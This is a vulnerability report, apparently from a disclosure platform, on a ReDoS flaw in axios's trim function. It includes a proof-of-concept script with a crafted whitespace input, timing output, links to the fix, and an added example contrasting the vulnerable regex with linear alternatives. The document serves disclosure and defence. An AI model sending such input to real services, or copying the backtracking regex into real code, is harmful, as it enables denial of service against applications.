Inefficient Regular Expression Complexity in axios/axios
Reported on
Aug 26th 2021
Description
A ReDoS (regular expression denial of service) flaw was found in the axios package. An attacker who can supply crafted input to the regular-expression-based trim function may cause an application to consume an excessive amount of CPU.
Similar issue for reference: https://nvd.nist.gov/vuln/detail/CVE-2020-7753
Proof of Concept
Create the following poc.js
// poc.js
var {trim} = require("axios/lib/utils");

// Build "1", n spaces, "1": the interior run of whitespace is what the
// regex in trim() backtracks over, and the trailing "1" means nothing is
// trimmable, so the whole run is scanned again and again.
function build_blank (n) {
  var ret = "1";
  for (var i = 0; i < n; i++) {
    ret += " ";
  }
  return ret + "1";
}

// Measure how long a single trim() call takes on a 50,000-space input.
var time = Date.now();
trim(build_blank(50000));
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost);
Then run the following commands in a terminal (install axios, then run the PoC):
npm i axios
node poc.js
Check the output (time in milliseconds):
time_cost: 2639
Impact
This vulnerability is capable of exhausting system resources and leads to crashes.
Location: utils.js#L188
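To show why the PoC input is expensive and what a safe trim looks like, here is an added example that is not part of the original report or of axios itself. It assumes (from memory of the linked fix commit, so treat it as an assumption) that the pre-fix axios trim used the two-regex pattern in trimVulnerable(); trimHardened(), trimLinear(), buildBlank() and timeTrim() are this example's own helpers.

```javascript
// Added example, not axios's own code. ASSUMPTION: trimVulnerable() is the
// pattern recalled from axios lib/utils.js before the linked fix commit.

// Vulnerable form: `\s*$` is attempted from every whitespace position, and
// each attempt scans the rest of the run before `$` fails on the trailing
// "1", so cost grows quadratically with the length of an interior run.
function trimVulnerable(str) {
  return str.replace(/^\s*/, '').replace(/\s*$/, '');
}

// Hardened form: prefer the native trim, a single linear scan with no
// backtracking (the shape of the upstream fix). The regex fallback exists
// only for engines without String.prototype.trim and is not the fix itself.
function trimHardened(str) {
  return typeof str.trim === 'function'
    ? str.trim()
    : str.replace(/^\s+|\s+$/g, '');
}

// Regex-free form with the same result: two index scans, O(n) by
// construction, useful as a reference when reviewing trim implementations.
function trimLinear(str) {
  let start = 0;
  let end = str.length;
  while (start < end && /\s/.test(str[start])) start++;
  while (end > start && /\s/.test(str[end - 1])) end--;
  return str.slice(start, end);
}

// Same input shape as the report's PoC: "1", n spaces, "1". Nothing is
// trimmable, so every correct implementation returns the input unchanged.
function buildBlank(n) {
  return '1' + ' '.repeat(n) + '1';
}

// Wall-clock cost of one call in milliseconds, for a manual comparison
// only (timing is not something to assert on in a test suite).
function timeTrim(fn, input) {
  const start = Date.now();
  fn(input);
  return Date.now() - start;
}

// Run all three on the PoC-sized input and report the cost of each.
function compareCosts(n) {
  const input = buildBlank(n);
  const report = {};
  for (const fn of [trimVulnerable, trimHardened, trimLinear]) {
    report[fn.name] = timeTrim(fn, input);
  }
  return report;
}
```

Calling compareCosts(50000) reproduces the report's measurement for the vulnerable form next to the two linear alternatives on the same input.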
@admin Can you please help to report this in the GitHub repo?
@admin The issue got confirmed and fixed in https://github.com/axios/axios/pull/3980 (proposed by me). Fix: https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929
CVE published!
It should be added to the National Vuln. Database shortly.
Is this only in version 0.21.2? Why not add this fix in the latest version?